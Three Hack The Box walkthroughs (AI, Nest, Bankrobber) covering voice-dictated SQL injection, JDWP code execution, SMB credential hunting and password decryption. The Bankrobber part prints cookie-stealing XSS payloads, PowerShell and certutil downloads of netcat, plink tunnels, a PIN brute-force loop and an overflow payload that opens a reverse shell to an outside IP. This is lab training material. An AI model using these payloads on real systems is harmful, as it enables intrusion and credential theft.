| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.04 seconds
Well, it looks like the web service is the way in. Let's see what's being hosted on port 80.
We have an Artificial Intelligence site. The links lead to PHP files. We'll start our enumeration with gobuster.
Command:
gobuster dir -u ai.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 75 -x php
Here are our results:
/uploads (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/db.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/intelligence.php (Status: 200)
/ai.php (Status: 200)
/server-status (Status: 403)
Now we'll start visiting these pages to see if there are any paths forward. The premise of the site is a search engine driven by voice recognition of uploaded audio files. On the ai.php page there is an upload form requesting a .wav file, so we upload a sample file and see what happens. We get a response (screenshot not reproduced here).
Good to know. We move on to the next page, intelligence.php, which lists the supported API calls. So the plan is to create a .wav with a text-to-speech engine, using the documented vocabulary to craft the payload.
A quick Google search for 'text to speech download' leads to a few sites. We need to be able to download the crafted audio as well; simply having it read back is not good enough.
Now let's craft an SQL injection using their documentation. It's noted at the bottom of the page that they mostly follow Microsoft's approach, so we dig up Microsoft's list of recognised dictation commands. Words like 'open parenthesis' and 'close parenthesis' can then be used to dictate the punctuation of our statement.
Crafted database command:
won open single quote union select database open parenthesis close parenthesis
comment database
Is the same as saying:
1'union select database()-- -
So now that we've fed this text into the text-to-speech engine, we save the file. Next we need to convert it to a .wav. There are plenty of ways to do this; two that work natively on Kali are:
ffmpeg -i input.mp3 output.wav
or
mpg123 -w output.wav input.mp3
Now that we have the payload compiled, so to speak, let's upload it.
Looks like it worked! We have a database name of alexa. We keep crafting payloads until we get what we need. Note that the playback speed at certain parts of the payload sometimes had to be slowed down for the recogniser to transcribe it correctly. In the case of finding the table:
won open single quote union select table underscore schema comma table underscore name comma won from information underscore schema dot tables
This one needed heavier tuning of speed, emphasis and voice.
After much trial and error, we finally get the user password:
Great, now we have a username and password. Maybe it'll work for SSH.
root@kali:~/htb/ai# ssh alexa@10.10.10.163
alexa@10.10.10.163's password: H,Sq9t6}a<)?q93_
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64)
alexa@AI:~$ cat user.txt
c43b62c682a8c0992eb6d4a2cda55e4b
We are in. We grab the user.txt flag and start enumerating for root. We spin up a SimpleHTTPServer, download linpeas.sh onto the box and run it. It shows a few more open ports available to us (screenshot not reproduced here).
We also see a cron job involving Tomcat, and a Java process whose command line references Tomcat with a debug agent listening on port 8000.
Some research shows this is the Java Debug Wire Protocol. The giveaway is the jdwp=transport fragment in the process arguments (the full agent option typically looks like -agentlib:jdwp=transport=dt_socket,...,address=8000). JDWP performs no authentication: anyone who can reach the port can attach a debugger, set breakpoints and invoke arbitrary Java methods inside the JVM, which is remote code execution. The first Google search for this returns quite a few RCE write-ups on the protocol; one of them breaks it down well and links a proof of concept (the original links are not preserved here).
We copy the PoC to the server and run it. It appears to execute, but we never catch a shell via netcat. Let's craft a payload with msfpc or msfvenom instead: msfpc elf tun0 generates a Linux ELF payload. We copy it to the server under /tmp, launch our MSF listener and retry. Still nothing. After some further digging it was suggested to hook a different Java method, one the application is certain to call; a basic choice is java.lang.String.indexOf. This time we run it and get a shell!
root.txt is right there as we land. Box complete! This was quite a unique box for sure, though I did NOT like the privesc part (it didn't work for me).
all credits go to https://rootflag.io/hack-the-box-ai/
htb-nest-nl
Hack The Box Nest (IP: 10.10.10.178) is a recently released Windows machine. The unintended way to own the box using Metasploit no longer works, because the HTB staff have patched the machine.
RECONNAISSANCE
I recently got introduced to a tool called AutoRecon (https://github.com/Tib3rius/AutoRecon). It produces a nice text report with the results categorised into folders.
Before handing the task to AutoRecon I used nmap to start the scan. The default top-1000 scan shows only SMB (445); the full-port scan AutoRecon runs additionally found port 4386, which comes into play later.
root@kali:~/htb/nest# nmap -sS -sV -sC -oN nmap.txt -Pn 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 03:44 EST
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.086s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 1m45s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-04T08:47:09
|_  start_date: 2020-02-04T05:55:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds
root@kali:/opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-share-permissions.txt
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                                                    Permissions
    ----                                                    -----------
    [!] Access Denied
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                                                    Permissions
    ----                                                    -----------
    ADMIN$                                                  NO ACCESS
    C$                                                      NO ACCESS
    Data                                                    READ ONLY
    IPC$                                                    NO ACCESS
    Secure$                                                 NO ACCESS
    Users                                                   READ ONLY
root@kali:/opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-list-contents.txt
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                                                    Permissions
    ----                                                    -----------
    [!] Access Denied
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445    Name: nest.htb
    Disk                                                    Permissions
    ----                                                    -----------
    ADMIN$                                                  NO ACCESS
    C$                                                      NO ACCESS
    Data                                                    READ ONLY
    .\
    dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
    dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
    dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
    dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
    dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
    .\\Shared\
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
    dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
    .\\Shared\Maintenance\
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
    dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
    -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
    .\\Shared\Templates\
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
    dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
    .\\Shared\Templates\HR\
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
    dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
    -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
    IPC$                                                    NO ACCESS
    Secure$                                                 NO ACCESS
    Users                                                   READ ONLY
    .\
    dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
    dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
    dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
    dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
    dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
    dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
    dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
Several SMB shares are readable as guest. In Data\Shared\Templates\HR there is a Welcome Email.txt file, an HR template for newly joined employees, and it contains a default username and password: TempUser:welcome2019
With a standard user's credentials I explored further and found an interesting XML configuration file in \IT\Configs\RU Scanner\. It holds the credentials of user C.Smith, with the password in an encrypted form (reversible, as it turns out):
c.smith:fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \IT\Configs\RU Scanner\>
I spent a few minutes trying to decrypt the password with online tools, but nothing helped, so I went back to the machine. A hint pointed at useful files under IT\Carl\VB Projects, so I went looking for them.
The NotepadPlusPlus folder contains two XML files. One is config.xml, whose History section at the end of the file lists the files the user recently opened. It shows that TempUser opened a file called Temp.txt from another user's folder, Carl, on the Secure$ share. Listing the IT folder of that share as TempUser is denied, but the ACL only blocks IT itself: the Carl subfolder can be listed directly when its path is given.
# root@kali ~/htb/nest [13:15:53]
$ smbclient //10.10.10.178/Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 02:08:12 2019
  ..                                  D        0  Thu Aug  8 02:08:12 2019
  Finance                             D        0  Wed Aug  7 22:40:13 2019
  HR                                  D        0  Thu Aug  8 02:08:11 2019
  IT                                  D        0  Thu Aug  8 13:59:25 2019

                10485247 blocks of size 4096. 6449680 blocks available
smb: \> cd IT
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 22:42:14 2019
  ..                                  D        0  Wed Aug  7 22:42:14 2019
  Docs                                D        0  Wed Aug  7 22:44:00 2019
  Reports                             D        0  Tue Aug  6 16:45:40 2019
  VB Projects                         D        0  Tue Aug  6 17:41:55 2019

                10485247 blocks of size 4096. 6449680 blocks available
smb: \IT\Carl\>
OBTAIN USER
Since the machine was quite unstable at the time, I downloaded the whole "VB Projects" folder to my machine to work out the hint. It contains two subfolders, Production and WIP. WIP holds a Visual Basic project called "RU Scanner". I copied the folder to my Windows host and opened the project in Visual Studio.
Going through the code, the program carries the decryption routine (Utils.DecryptString) for the passwords in its config file, so it can decipher the C.Smith password found earlier.
Debugging the project produced the error below: a configuration file has to be loaded first. I could not find that file, so I commented the load out of the main module and put the username and the encrypted password in directly.
My edited Main in Module1 looks like this. With a breakpoint on End Sub the debugger stops right after the call, and the decrypted password can be read from the test object's Password field:
Module Module1
    Sub Main()
        'Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = "C.Smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub
End Module
Now I have the password of user C.Smith: xRxRxPANCAK3SxRxRx.
C.Smith's folder on the Users share contains an "HQK Reporting" folder with some files and a subfolder that look interesting, so let's download them.
ALTERNATE DATA STREAMS (ADS):
The file "Debug Mode Password.txt" in HQK Reporting is an example of an NTFS Alternate Data Stream (ADS).
An NTFS file can carry named $DATA streams beside its default, unnamed one. Here the default stream is empty, which is why the file lists with size 0, while a named stream holds the debug-mode password.
A plain copy only transfers the default stream, so a file fetched with smbclient's get arrives empty. Either read it from Windows, or stay on Linux and use smbclient's allinfo "Debug Mode Password.txt" to list the streams and get "Debug Mode Password.txt:Password" to retrieve the named one.
I mapped //10.10.10.178/Users/C.Smith/ as a network drive on a Windows host. Get-Item -Stream * lists the stream names and revealed one called "Password"; Get-Content (alias type) with -Stream Password then prints it. In our case the password is: WBQ201953D8w
I used telnet to connect to the second port (4386) found during the initial port scan. After connecting, I used the debug password to enable debug mode, and the LDAP query file in the LDAP directory contains the Administrator's encrypted credentials:
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
COMPILING THE BINARY
The administrator password can be decrypted using the binary in user C.Smith's directory. This binary can be downloaded to your Windows machine by mapping the network drive, or via the "net view" command from the command prompt.
I downloaded the file to a folder on my desktop through the mapped drive. The binary can be opened with any .NET decompiler/debugger,
for example dnSpy: https://github.com/0xd4d/dnSpy/releases
I opened the file in my debugger and started analyzing MainModule(). The two warning messages in the screenshot below caught my attention:
To run the binary we need two things, otherwise it fails: a configuration file and a file named "HqDbImport.exe". The configuration file was located in the LDAP folder; its contents can easily be copied into Notepad to make a duplicate. I couldn't find HqDbImport.exe, and although I checked the binary's arguments, nowhere in MainModule was such a file referenced. So I made a copy of HqkLdap.exe, renamed it to HqDbImport.exe and put it in a separate folder. I created a .config file with the content below.
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
So now I have the 3 files in the new folder, ready to run and decrypt the admin password:
After running the binary from the command line, I immediately got the decrypted administrator password.
Administrator: XtH4nkS4Pl4y1nGX
Now I am on the final step before getting root on the system. I use Impacket's psexec.py to log in.
root@kali:~/htb/nest# psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file wqVdOFDs.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service AGLN on 10.10.10.178.....
[*] Starting service AGLN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
6594c2eb084bc0f08a42f0b94b878c41

c:\Users\Administrator\Desktop>
Author: Puckiestyle
htb-bankrobber-nl
As always, first an nmap scan
root@kali:~/htb/bankrobber# nmap -A 10.10.14.5 -oN AllPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 06:24 EST
Nmap scan report for 10.10.14.5
Host is up (0.000051s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06 (RSA)
|   256 72:bb:d3:17:56:d4:0d:fe:cb:3e:64:c9:5c:7a:41:a6 (ECDSA)
|_  256 66:62:0f:03:e5:d8:7f:e1:e8:dd:f2:ab:17:4c:a1:fc (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp    rpcbind
|   100000  2,3,4      111/udp    rpcbind
|   100000  3,4        111/tcp6   rpcbind
|_  100000  3,4        111/udp6   rpcbind
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.7.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.7.4
|_http-title: Directory listing for /
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds
Now we first create a new user and log in as that user.
Then we capture the admin cookie:
<script>new Image().src="http://10.10.14.5:8000/bogus.php?output="+document.cookie;</script>
or
<img src=x onerror=this.src='http://10.10.14.5:8000/?c='+document.cookie>
root@kali:~/htb/# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found
10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
Then send an XSS payload that runs a PowerShell iwr download script:
<script type="text/javascript">
var Http = new XMLHttpRequest();
var url = '/admin/backdoorchecker.php';
var params = 'cmd=dir | powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile %temp%\a.exe"; %temp%\a.exe -e cmd.exe 10.10.14.5 1111';
Http.open("POST", url, true);
Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
Http.send(params);
</script>
If necessary, we check whether the admin auto-approved it (not strictly necessary, only for verification):
first edit the admin cookie.
Then catch the user shell:
root@kali:~/htb/bankrobber# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\admin>whoami
whoami
bankrobber\cortin

C:\xampp\htdocs\admin>cd c:\users\Cortin\Desktop

C:\Users\Cortin\Desktop>type user.txt
type user.txt
f635346600876a43441cf1c6e94769ac
c:\>mkdir temp
c:\temp>certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c:\Temp\plink.exe
c:\temp>.\plink.exe -R 3306:127.0.0.1:3306 10.10.14.10

root@kali:~/htb/bankrobber# mysql -u root -h 127.0.0.1 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1019
Server version: 10.1.38-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bankrobber         |
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.091 sec)

MariaDB [(none)]> select LOAD_FILE('/Users/Administrator/Desktop/root.txt');
MariaDB [(none)]> select LOAD_FILE('/Users/Cortin/Desktop/user.txt');
Later, after brute-forcing the PIN (after the plink reverse tunnel c:\temp\plink.exe -R 4466:127.0.0.1:910 10.10.14.5),
with a script,
or:
root@kali:~/htb/bankrobber# cat bandit.sh
for x in {0..9}{0..9}{0..9}{0..9}; do echo $x | nc 192.168.1.139 910 | egrep -v "correct"; echo "Try $x"; done
the PIN turned out to be: 0021
C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c:\temp\nc64.exe
C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c:\temp\plink.exe
C:\temp>.\plink.exe -R 4466:127.0.0.1:910 10.10.14.5

root@kali:~/htb/bankrobber# netstat -ano | grep 4455
tcp        0      0 127.0.0.1:4455          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:4455                :::*                    LISTEN      off (0.00/0/0)
root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN is correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 1
[$] Transfering $1 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
[$] Transaction in progress, you can safely disconnect...
c:\bankv2.exe is vulnerable to an "Integer Overflow".
After asking on the forum, it turned out the offset is about 32 A characters.
I used digits instead of A's, so the padding is:
12345678901234567890123456789012
Whatever follows this padding is what gets executed, so the payload goes right after it.
My payload was:
12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transfering $12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transaction in progress, you can safely disconnect...
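What the session above shows (32 bytes of padding, then whatever follows is run as the transfer tool) is the behaviour of a fixed-size amount field sitting directly in front of the tool path in memory, so an over-long amount string overwrites the path. The C program below is an added example, not code from the original post or from bankv2.exe; the record layout, the 32- and 128-byte field sizes, the function names and the placeholder path C:\lab\placeholder.exe are all assumptions for illustration. It puts the unchecked copy next to a hardened handler that only accepts a short all-digit amount, which is the check that closes this class of bug whatever the exact layout of the real binary.

```c
/* Added example, not code from the original post or from bankv2.exe.
 * It models a transfer handler whose fixed 32-byte "amount" field sits
 * directly in front of the path of the tool it later executes, so an
 * amount string longer than 32 bytes spills into that path. The layout,
 * sizes, names and the placeholder path are assumptions for illustration. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define AMOUNT_LEN 32                       /* bytes reserved for the amount */
#define PATH_LEN   128                      /* bytes reserved for the tool path */
#define RECORD_LEN (AMOUNT_LEN + PATH_LEN)

/* Tool the service is supposed to run (constructed placeholder value). */
static const char DEFAULT_TOOL[] = "C:\\Users\\admin\\Documents\\transfer.exe";

/* One flat record: bytes [0,32) hold the amount, bytes [32,160) the path.
 * Modelled as a single array so the overwrite below stays well-defined C. */
typedef struct {
    char bytes[RECORD_LEN];
} transfer_record;

static void record_init(transfer_record *r) {
    memset(r->bytes, 0, sizeof r->bytes);
    /* DEFAULT_TOOL is 38 bytes including its NUL, well inside PATH_LEN */
    memcpy(r->bytes + AMOUNT_LEN, DEFAULT_TOOL, sizeof DEFAULT_TOOL);
}

static const char *record_tool_path(const transfer_record *r) {
    return r->bytes + AMOUNT_LEN;
}

/* Vulnerable pattern: copies the caller's amount string with no length
 * check, so everything after byte 31 lands in the tool-path region. */
void set_amount_unsafe(transfer_record *r, const char *input) {
    size_t n = strlen(input);
    if (n > (size_t)RECORD_LEN - 1) n = RECORD_LEN - 1;  /* demo guard only, not part of the bug */
    memcpy(r->bytes, input, n);
    r->bytes[n] = '\0';
}

/* Hardened handler: an amount must be 1..31 decimal digits; anything else
 * is rejected before it touches the record, so the path cannot change. */
bool set_amount_safe(transfer_record *r, const char *input) {
    size_t n = strlen(input);
    if (n == 0 || n >= AMOUNT_LEN) return false;
    for (size_t i = 0; i < n; i++)
        if (input[i] < '0' || input[i] > '9') return false;
    memcpy(r->bytes, input, n);
    r->bytes[n] = '\0';
    return true;
}

static transfer_record demo;   /* record reused by the two helpers below */

/* Feed one amount string through the vulnerable handler and return the
 * path the service would execute afterwards. */
const char *tool_path_after_unsafe(const char *input) {
    record_init(&demo);
    set_amount_unsafe(&demo, input);
    return record_tool_path(&demo);
}

/* Same through the hardened handler; NULL means the input was rejected. */
const char *tool_path_after_safe(const char *input) {
    record_init(&demo);
    if (!set_amount_safe(&demo, input)) return NULL;
    return record_tool_path(&demo);
}

int main(void) {
    /* 32 digits of padding followed by a constructed placeholder path */
    const char *padded = "12345678901234567890123456789012C:\\lab\\placeholder.exe";

    printf("unsafe, amount \"1\":     runs %s\n", tool_path_after_unsafe("1"));
    printf("unsafe, 32-byte padding: runs %s\n", tool_path_after_unsafe(padded));
    const char *safe = tool_path_after_safe(padded);
    printf("safe,   32-byte padding: %s\n", safe ? safe : "input rejected, path unchanged");
    return 0;
}
```

With a normal amount the unsafe handler leaves the default tool in place; with the padded input the bytes after position 32 become the path that is executed, which is exactly the symptom in the session above. The hardened handler rejects the same input and also rejects anything that is not a plain number, so the path region is never reachable from user input.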
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 1236
listening on [any] 1236 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\admin\desktop
cd c:\users\admin\desktop

c:\Users\admin\Desktop>type root.txt
type root.txt
aa65d8e6216585ea636eb07d4a59b197

c:\Users\admin\Desktop>
Author: Puckiestyle